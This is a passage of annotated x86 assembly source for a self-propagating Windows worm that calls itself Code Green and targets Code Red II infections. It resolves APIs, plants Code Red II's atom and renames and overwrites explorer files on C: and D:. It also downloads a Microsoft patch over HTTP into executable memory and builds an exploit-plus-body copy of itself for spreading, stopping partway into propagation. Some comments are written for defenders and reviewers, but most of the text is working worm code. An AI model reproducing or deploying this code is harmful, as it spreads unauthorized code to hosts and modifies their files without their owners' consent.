add edi, 4
;----------------------------------------------------------------------
; Resolve LoadLibraryA through the GetProcAddress routine reached via
; EDX and store it in ProcTable[API_LoadLibrary].
; Register roles (inferred from use; their setup is outside this chunk):
;   EDX = GetProcAddress, ESI = hModule passed to it (presumably kernel32
;   -- confirm in the caller), EBP = delta base for [ebp][sym] addressing.
; Trick: the result is written into the saved-ECX slot of the PUSHAD
; frame, so POPAD leaves it in ECX while restoring everything else.
;----------------------------------------------------------------------
_GetProcAddy_LoadLibrary:
pushad                                  ; frame: [esp+24] = saved ECX
lea eax, [ebp][Str_LoadLibrary]         ; lpProcName (string defined elsewhere)
push eax
push esi                                ; hModule
call edx                                ; GetProcAddress(hModule, lpProcName); stdcall pops both args
mov [esp+24], eax ;ECX: LoadLibrary -- overwrite the saved-ECX slot so POPAD yields EAX in ECX
popad
mov [ebp][ProcTable+API_LoadLibrary], ecx ; ProcTable[API_LoadLibrary] = LoadLibrary (NULL not checked)
;----------------------------------------------------------------------
; Load the extra DLLs the code needs and record their module handles,
; 4 bytes apiece, in the table EDI points into (DllTable).
; In:  ECX = LoadLibrary, EDI -> next free DllTable slot,
;      [esp] = DllTable base (pushed before this chunk).
; Out: ESI -> DllTable, EBX -> ProcTable+8, EDI -> ProcNameTable.
; The four name strings are defined outside this chunk; by their labels
; they are expected to be advapi32, user32, a winsock DLL and wininet
; (confirm against the data section). Return values are not checked.
; PUSHAD/POPAD keeps ECX and EDX intact across each call; the handle is
; stored to memory inside the frame, so it survives POPAD.
;----------------------------------------------------------------------
_LoadUsedLibraries:
pushad
lea esi, [ebp][Str_Advapi]
push esi
call ecx ;LoadLibrary
mov [edi], eax                          ; DllTable[n] = hAdvapi
popad
add edi, 4
pushad
lea esi, [ebp][Str_User]
push esi
call ecx ;LoadLibrary
mov [edi], eax                          ; DllTable[n+1] = hUser
popad
add edi, 4
pushad
lea esi, [ebp][Str_WSock]
push esi
call ecx ;LoadLibrary
mov [edi], eax                          ; DllTable[n+2] = hWSock
popad
add edi, 4
pushad
lea esi, [ebp][Str_WinInet]
push esi
call ecx ;LoadLibrary
mov [edi], eax                          ; DllTable[n+3] = hWinInet
popad
pop esi ;esi -> DllTable (base pushed before this chunk)
lea ebx, [ebp][ProcTable+8]             ; first slot after the two entries already resolved (inferred)
lea edi, [ebp][ProcNameTable]           ; NUL-separated API names, grouped per DLL
;----------------------------------------------------------------------
; Resolve every name in ProcNameTable with GetProcAddress and store the
; addresses consecutively in ProcTable.
; In:  EDX = GetProcAddress, ESI -> DllTable (one HMODULE per name group),
;      EBX -> next ProcTable slot, EDI -> ProcNameTable.
; ProcNameTable layout, as implied by the scan below: NUL-terminated
; names; an empty name (two consecutive NULs) ends a DLL's group and
; moves on to the next DllTable handle; one more NUL ends the table.
; The scan is unbounded (ECX = -1) and assumes DF is clear; a malformed
; table would run off the end. Resolved addresses are not NULL-checked.
;----------------------------------------------------------------------
_LoadUsedFunctions:
pushad
push edi ;ProcName
push [esi]                              ; hModule of the current DLL
call edx ;GetProcAddy                   ; GetProcAddress(hModule, ProcName)
mov [ebx], eax                          ; ProcTable[n] = address
popad
add ebx, 4                              ; next ProcTable slot
SearchNextFunctionName:
xor al, al                              ; scan for the terminating NUL
xor ecx, ecx
dec ecx                                 ; ECX = -1: no length limit
repne scasb                             ; EDI -> byte after the NUL
cmp al, byte ptr [edi] ;[edi](byte)=0?  ; non-zero: another name in this group
jne _LoadUsedFunctions
SearchNextDll:
add esi, 4                              ; next DllTable handle
inc edi                                 ; skip the group separator
cmp al, byte ptr [edi]                  ; a further NUL ends the table
je AllFunctionsLoaded
jmp _LoadUsedFunctions
AllFunctionsLoaded:
;----------------------------------------------------------------------
; Run-once guard: look up the worm's atom (CGAtom) in the atom table.
; If it exists, park this thread in an endless Sleep loop; otherwise add
; the atom and continue.
; Note (review): FindAtom/AddAtom use the process-local atom table, so
; this only detects an earlier run inside the same process, not a prior
; infection of the host.
; Defender note: the presence of the CGAtom string in a process's atom
; table is a host-based indicator that this code has executed there.
;----------------------------------------------------------------------
_CheckIfCodeGreenIsAlreadyExecuted:
CheckIfCodeGreenAtomIsPresent:
lea ebx, [ebp][CGAtom]
push ebx
call [ebp][ProcTable+API_FindAtom]      ; FindAtomA(CGAtom) -> AX = atom, 0 if absent
or ax, ax
jz DumpCodeGreenAtom                    ; absent: first run in this process
TerminateCodeGreenExecution:
push 2678400000 ;31 days                ; 31*24*3600*1000 ms, fits in a DWORD
call [ebp][ProcTable+API_Sleep]
jmp TerminateCodeGreenExecution         ; the thread never leaves this loop
DumpCodeGreenAtom:
push ebx                                ; EBX survives the call (callee-saved in Win32)
call [ebp][ProcTable+API_AddAtom]       ; AddAtomA(CGAtom); result ignored
;----------------------------------------------------------------------
; Allocate one 0x70000-byte RWX region that later code reuses as
; scratch: the executable image is assembled in it, then the download
; URL is built in it, then it receives the downloaded patch.
; Out: ESI = [MemPointer] = base address. A failed VirtualAlloc (EAX = 0)
; is not checked, so every later use would dereference NULL.
; Defender note: a PAGE_EXECUTE_READWRITE commit from user code is a
; common detection heuristic for injected or self-decoding code.
;----------------------------------------------------------------------
_ReserveMemory:
push PAGE_EXECUTE_READWRITE             ; flProtect
push MEM_COMMIT                         ; flAllocationType
push 00070000h ;ca. 450kb               ; dwSize (0x70000 = 458752 bytes)
push NULL                               ; lpAddress: let the OS choose
call [ebp][ProcTable+API_VirtualAlloc]
mov esi, eax ;ESI: AllocatedMem
mov [ebp][MemPointer], eax
;**********************************************************************************
;*** anti Code Red II ***
;**********************************************************************************
;----------------------------------------------------------------------
; Plant Code Red II's global atom (CRIIAtom) if it is not already there
; -- presumably so that worm's own run-once check sees itself as
; present -- then rename the files named by OldExplorer/NewExplorer.
; The loop runs twice (BH = 2) with BL = "C" then "D"; the letter is
; stored into both path strings, presumably as the drive letter (the
; strings are defined elsewhere -- confirm). Each pass clears the file's
; attributes and renames OldExplorer to NewExplorer; both results are
; ignored. MOVEFILE_REPLACE_EXISTING is commented out, so the rename
; fails silently when NewExplorer already exists.
; EBX keeps BL/BH across the calls because it is callee-saved in Win32.
;----------------------------------------------------------------------
_AntiCodeRedII:
_CheckIfCodeRedIIAtomIsPresent:
lea ebx, [ebp][CRIIAtom]
push ebx
call [ebp][ProcTable+API_GlobalFindAtom] ; GlobalFindAtomA(CRIIAtom) -> AX
or ax, ax
jnz _RelaceExistingExplorerBackdoor     ; already present: do not add it again
DumpCodeRedIIAtom:
push ebx
call [ebp][ProcTable+API_GlobalAddAtom]  ; GlobalAddAtomA(CRIIAtom)
_RelaceExistingExplorerBackdoor:
mov bl, "B"                             ; BL: letter before the first one used
mov bh, 2                               ; BH: passes remaining
lea esi, [ebp][OldExplorer]
lea edi, [ebp][NewExplorer]
_MoveExplorerTo_xplorerLoop:
inc bl                                  ; "C", then "D"
mov [esi], byte ptr bl                  ; patch the letter into both path strings
mov [edi], byte ptr bl
push FILE_ATTRIBUTE_NORMAL              ; dwFileAttributes
push esi                                ; lpFileName
call [ebp][ProcTable+API_SetFileAttributes] ; SetFileAttributesA(OldExplorer, NORMAL)
;push MOVEFILE_REPLACE_EXISTING
push edi                                ; lpNewFileName
push esi                                ; lpExistingFileName
call [ebp][ProcTable+API_MoveFile]      ; MoveFileA(OldExplorer, NewExplorer); result ignored
dec bh
or bh, bh
jnz _MoveExplorerTo_xplorerLoop
;----------------------------------------------------------------------
; Assemble the replacement executable in the VirtualAlloc'd buffer.
; The image is stored as four pieces (eExeContent1..4; eExeContent5 is
; only the end marker). Each piece ends with a DWORD giving how many
; output bytes to skip before the next piece, so runs of zeros are not
; stored: the skipped bytes stay zero because MEM_COMMIT memory is
; zero-filled. The 'offset X - offset Y - 4' sizes exclude that DWORD,
; so after each REP MOVSB ESI points exactly at it.
; In:  [MemPointer] -> buffer.
; Out: EDI -> image start, EBX = image length in bytes (the last skip
;      value is included in the length).
;----------------------------------------------------------------------
_BuildAntiCodeRedExe:
mov edi, [ebp][MemPointer]
cld                                     ; forward string operations from here on
lea esi, [ebp][eExeContent1]
mov ecx, offset eExeContent2 - offset eExeContent1 -4
rep movsb
add edi, [esi] ;dword ptr [eExeContent2-4] -- skip gap, left as zeros
lea esi, [ebp][eExeContent2]
mov ecx, offset eExeContent3 - offset eExeContent2 -4
rep movsb
add edi, [esi] ;dword ptr [eExeContent3-4]
lea esi, [ebp][eExeContent3]
mov ecx, offset eExeContent4 - offset eExeContent3 -4
rep movsb
add edi, [esi] ;dword ptr [eExeContent4-4]
lea esi, [ebp][eExeContent4]
mov ecx, offset eExeContent5 - offset eExeContent4 -4
rep movsb
add edi, [esi] ;dword ptr [eExeContent5-4]
mov ebx, edi                            ; end of image
mov edi, [ebp][MemPointer] ;EDI -> AntiCodeRedBuffer
sub ebx, edi ;EBX: LenAntiCodeRed
;----------------------------------------------------------------------
; Write the assembled image to the OldExplorer path for the letters
; "C" and "D" (same letter-patching scheme as the rename loop above).
; In:  EDI -> image, EBX = image length. CL/CH hold the loop state and
;      are pushed around the API calls because ECX is caller-saved.
; Error handling: neither the CreateFileA result (INVALID_HANDLE_VALUE
; on failure) nor the WriteFile result is checked; CloseHandle is
; called on whatever CreateFileA returned.
; Defender note: CREATE_ALWAYS with exclusive share mode on a fixed
; root-level path is the file-system footprint of this stage.
;----------------------------------------------------------------------
_SaveAntiCodeRedExe:
mov cl, "B"
mov ch, 2                               ; two passes
lea esi, [ebp][OldExplorer]
_SaveAntiCodeRedLoop:
inc cl                                  ; "C", then "D"
mov [esi], byte ptr cl                  ; patch the letter into the path
push ecx                                ; preserve the loop counters
CreateAntiExplorer:
push 0                                  ; hTemplateFile
push FILE_ATTRIBUTE_NORMAL              ; dwFlagsAndAttributes
push CREATE_ALWAYS                      ; dwCreationDisposition: overwrite
push 0                                  ; lpSecurityAttributes
push 0                                  ; dwShareMode: exclusive
push GENERIC_READ or GENERIC_WRITE      ; dwDesiredAccess
push esi                                ; lpFileName
call [ebp][ProcTable+API_CreateFile]    ; CreateFileA -> EAX = hFile
WriteAntExplorer:
push eax                                ; keep hFile for CloseHandle
push 0                                  ; stack DWORD receiving the bytes-written count
mov edx, esp
push 0 ;lpOverlapped
push edx ;lpNrOfBytesWritten
push ebx ;dwNrOfBytes2Write
push edi ;lpBuffer
push eax ;hFile
call [ebp][ProcTable+API_WriteFile] ;WriteFile -- result and count are ignored
pop eax                                 ; discard bytes-written count
pop eax                                 ; EAX = hFile again
CloseAntiExplorerHandle:
push eax
call [ebp][ProcTable+API_CloseHandle]
pop ecx                                 ; restore CL/CH
dec ch
or ch, ch
jnz _SaveAntiCodeRedLoop
;**********************************************************************************
;*** download patch ***
;**********************************************************************************
;----------------------------------------------------------------------
; Pick the language index used when building the patch URL.
; GetSystemDefaultLangID returns the LANGID in AX; for primary language
; IDs that fit in a byte, AL = primary language and AH = sub-language.
; BH receives the index:
;   AL in 1..31, no special case          -> BH = AL
;   Chinese (AL = 4), simplified (AH = 2) -> BH = 3
;   Portuguese (AL = 16h), Brazil (AH = 1)-> BH = 23
;   AL = 0 or out of range                -> BH = 9 (English)
; Note (review): 'cmp bh, 31 / jg' is a signed compare, so AL >= 80h is
; treated as in range instead of falling back to English; only the low
; byte of the primary-language field is examined.
; ESI is reloaded with the scratch buffer for the URL builder below.
;----------------------------------------------------------------------
mov esi, [ebp][MemPointer]
_DetermineSystemLanguage:
call [ebp][ProcTable+API_GetSystemDefaultLangID] ;407h = german
mov bh, al ;BH: LangID (primary language byte)
or bh, bh
jz LangIDNotBetween1And31
cmp bh, 31
jg LangIDNotBetween1And31               ; signed compare, see note above
IsChinese:
cmp al, 4 ;chinese
jne NotChinese
cmp ah, 2                               ; sub-language: simplified
jne NotChineseSimplified
mov bh, 3 ;ChineseSimplified [3]
jmp SystemLanguageDetermined
NotChinese:
NotChineseSimplified:
cmp al, LANG_PORTUGUESE ;16h
jne NotPortuguese
cmp ah, SUBLANG_PORTUGUESE_BRAZILIAN ;01h
jne NotPortugueseBrazilian
mov bh, 23 ;Brazilian [23]
;jmp SystemLanguageDetermined
NotPortuguese:
NotPortugueseBrazilian:
jmp SystemLanguageDetermined
LangIDNotBetween1And31:
mov bh, 9 ;uses ENGLISH as default language
;jmp SystemLanguageDetermined
SystemLanguageDetermined:
;----------------------------------------------------------------------
; Build the NUL-terminated patch download URL in the scratch buffer.
; In:  ESI -> buffer, BH = language index from above.
; Out: ESI -> URL (the buffer address is pushed on entry and popped at
;      DownloadUrlBuilt); EDI -> byte after the terminating NUL.
;      ESI and EDI are swapped meanwhile (EDI writes, ESI reads).
; Helpers defined outside this chunk (behaviour inferred from use):
;   DetermineStringLength  sets ECX to the length of the string at ESI,
;                          apparently excluding the NUL (see 'inc esi'
;                          at NT5_AddPart_3, which steps over it to the
;                          string assumed to follow DLUrlNT5_2 in memory)
;   FindUrlTableEntry      returns ESI -> NT5UrlTable entry for BH
; A table entry is assumed to hold a 3-character server id (e.g. "131")
; at +0 and a 5-character locale (e.g. "EN-US") at +3. STOSD writes the
; whole DWORD and DEC EDI drops the 4th byte, so only 3 are kept. An
; empty entry falls back to English (BH = 9) with DLError = 1 and
; retries the lookup.
; The NT4 branch is commented out; only the NT5 (Windows 2000) URL is
; built. EAX keeps the entry DWORD between the two STOSD writes.
;----------------------------------------------------------------------
_BuildDownloadUrl:
push esi ;ptrBufMem                     ; popped at DownloadUrlBuilt
xchg esi, edi ;EDI -> BufMem
xor ecx, ecx
xor eax, eax
dec ecx                                 ; ECX = -1 before the first length call
;if an exploit for NT4 came out, we might need this:
; cmp bl, 4
; jne OS_NT5 ;GetTablePosByLangID
; OS_NT4:
; NT4_CopyFirstPartOfUrl:
; lea esi, [ebp][DLUrlNT4]
; call DetermineStringLength
; rep movsb
; NT4_AddUrlTableEntry:
; lea esi, [ebp][NT4UrlTable] ;ESI -> NT[OS-Version]UrlTable
; call FindUrlTableEntry
; cmp [esi], byte ptr 0
; jne NT4_ValidEntryInTableFound
; NT4_NoValidEntryInTable:
; mov bh, 9
; mov [ebp][DLError], byte ptr 1
; jmp NT4_AddUrlTableEntry
; NT4_ValidEntryInTableFound:
; call DetermineStringLength
; rep movsb
; NT4_AddFileName:
; lea esi, [ebp][DLUrlNT4_2]
; call DetermineStringLength
; inc ecx ;add zero at the end
; rep movsb
; jmp DownloadUrlBuilt
OS_NT5:
NT5_CopyFirstPartOfUrl: ;"http://a"
lea esi, [ebp][DLUrlNT5]
call DetermineStringLength              ; ECX = strlen(DLUrlNT5)
rep movsb
NT5_FindUrlTableEntry:
lea esi, [ebp][NT5UrlTable] ;ESI -> NT[OS-Version]UrlTable
call FindUrlTableEntry                  ; ESI -> entry for BH
cmp [esi], byte ptr 0
jne NT5_ValidEntryInTableFound
NT5_NoValidEntryInTable:
mov bh, 9                               ; fall back to English and retry
mov [ebp][DLError], byte ptr 1          ; record that the language was not available
jmp NT5_FindUrlTableEntry
NT5_ValidEntryInTableFound: ;esi -> TableEntry
NT5_AddUrlTableEntry: ;"131"
mov eax, dword ptr [esi]                ; entry bytes 0..3
stosd
dec edi                                 ; keep only 3 of the 4 bytes
push esi ;->TableEntry
NT5_AddPart_2: ;".ms.a.microsoft.com/f/"
lea esi, [ebp][DLUrlNT5_2]
call DetermineStringLength
rep movsb
NT5_AddUrlTableEntry_2: ;"131"          ; EAX still holds the entry DWORD
stosd
dec edi
NT5_AddPart_3: ;"/1611/2h/download.microsoft.com/download/win2000platform/Patch/q300972/NT5/"
inc esi                                 ; step over the NUL to the next string (assumed adjacent)
call DetermineStringLength
rep movsb
NT5_AddUrlTableEntry_3: ;"EN-US"
pop esi                                 ; ESI -> entry
add esi, 3                              ; ESI -> locale part of the entry
push esi                                ; kept for the file-name suffix below
call DetermineStringLength
rep movsb
NT5_AddPart_4: ;"Q300972_W2K_SP3_x86_"
lea esi, [ebp][DLUrlNT5_4]
call DetermineStringLength
rep movsb
NT5_AddFileName: ;"en"
pop esi                                 ; ESI -> locale part again
mov ax, word ptr [esi]                  ; default: first two characters
cmp bh, 23 ;Brazilian
jne NT5_UseFirstTwoBytes ;NotPortugueseBrazilian
NT5_UseLastTwoBytes:
mov ax, word ptr [esi+3]                ; Brazilian: last two characters
NT5_UseFirstTwoBytes:
stosw
NT5_AddFileExtension:
mov eax, "EXE."                         ; little-endian, so memory reads ".EXE"
stosd
mov [edi], byte ptr 0                   ; terminate the URL
DownloadUrlBuilt:
pop esi ;esi -> UrlString
;----------------------------------------------------------------------
; Fetch the patch over HTTP with WinINet into the scratch buffer.
; In:  ESI -> URL; the same buffer is reused as the receive buffer,
;      so the downloaded bytes overwrite the URL text once it is no
;      longer needed.
; Out: [LenPatchFile] = bytes received, [DLError] = 2 on any failure.
; Note (review): a single InternetReadFile of up to 0x70000 bytes is
; issued and any non-zero count counts as success, so a partial read
; yields a truncated file without being flagged.
; Note (review): on the InternetOpenUrlA failure path EDI was never
; loaded with a handle, yet InternetCloseHandle(EDI) is still called.
; Note (review): the InternetOpenA result is not NULL-checked before
; being passed to InternetOpenUrlA.
; Defender note: the user-agent string Net_BrowserName (defined
; elsewhere) and the fixed download URL appear in proxy/web logs.
;----------------------------------------------------------------------
_DownloadPatchFile:
push 0 ;dwFlags
push INTERNET_INVALID_PORT_NUMBER ;dwPort [0] -- this slot is lpszProxyBypass; the constant is 0, i.e. NULL
push NULL ;lpProxyName
push PRE_CONFIG_INTERNET_ACCESS ;dwAccessType
lea eax, [ebp][Net_BrowserName]
push eax ;lpCallerName                  ; lpszAgent (user-agent)
call [ebp][ProcTable+API_NetOpen] ;InternetOpenA
mov ebx, eax ;EBX: hNet                 ; not checked for NULL
push 0 ;dwContext
push INTERNET_FLAG_RELOAD ;dwFlags      ; bypass any cached copy
push 0 ;dwHeadersLength
push NULL ;lpHeaders
push esi ;lpUrl
push ebx ;hNet
call [ebp][ProcTable+API_NetOpenUrl] ;InternatOpenUrlA
or eax, eax
jz DownloadPatchFile_ERROR              ; EDI is still the URL-builder pointer here
mov edi, eax ;EDI: hUrlFile
lea eax, [ebp][LenPatchFile]
push eax ;lpNrOfBytesRead
push 00070000h ;dwNrOfBytes2Read        ; bounded by the buffer size allocated above
push esi ;lpBuffer                      ; overwrites the URL text
push edi ;hUrlFile
call [ebp][ProcTable+API_NetReadFile] ;InternetReadFile -- one call only, may return less than the whole file
or eax, eax
jz DownloadPatchFile_ERROR
cmp [ebp][LenPatchFile], dword ptr 0    ; zero bytes read also counts as failure
je DownloadPatchFile_ERROR
jmp CloseInternetHandles
DownloadPatchFile_ERROR:
mov [ebp][DLError], byte ptr 2
CloseInternetHandles:
push edi                                ; hUrlFile (garbage on the OpenUrl failure path)
call [ebp][ProcTable+API_NetCloseHandle] ;InternetCloseHandle
push ebx                                ; hNet
call [ebp][ProcTable+API_NetCloseHandle]
;**********************************************************************************
;*** propagation ***
;**********************************************************************************
;----------------------------------------------------------------------
; Assemble a complete copy of the worm in a freshly reserved stack area
; -- the exploit prefix (CodeGreenExploit, CGExploitLen bytes) followed
; by the worm body (from _CGEntry, CGLen bytes) -- and reset the
; propagation state variables.
; Stack layout afterwards: [esp] = number of DWORDs reserved (EBX),
; [esp+4 ..] = the payload; [ptrNewCodeGreen] = ESP. The area is first
; filled with 90h bytes; the size is rounded up to whole DWORDs plus one.
; Assumes DF is still clear (CLD was issued in the image builder).
; Defender note: this is the stage that produces the self-copy used for
; spreading; the payload lives on the stack, not in the RWX buffer.
;----------------------------------------------------------------------
_BuildCodeGreen:
lea esi, [ebp][CodeGreenExploit]
mov eax, CGExploitLen + CGLen           ; total payload size in bytes
mov ecx, eax
shr ecx, 2 ;div 4
inc ecx                                 ; +1 DWORD, even when already a multiple of 4
mov ebx, ecx ;ebx: NrOfPushs
ReserveStackLoop:
push 090909090h                         ; 4 filler bytes per iteration
loop ReserveStackLoop
push ebx ;first DW in stack-field holds NrOfPushs
mov [ebp][ptrNewCodeGreen], esp
CopyCodeGreenExploit:
mov ecx, CGExploitLen ;eax
lea edi, [esp+4]                        ; destination: just above the count DWORD
rep movsb                               ; copy the exploit prefix; EDI advances
AddCodeGreenCode:
lea esi, [ebp][_CGEntry]
mov ecx, CGLen
rep movsb                               ; append the worm body directly after it
_StartPropagation:
mov [ebp][NrOfThreads], word ptr 0      ; reset propagation state (word / byte / dword)
mov [ebp][EndThreadsFlag], byte ptr 0
mov [ebp][CurrentIP], dword ptr 0
Main_StartRandomGenerator:
push 0
push esp ;lpThreadId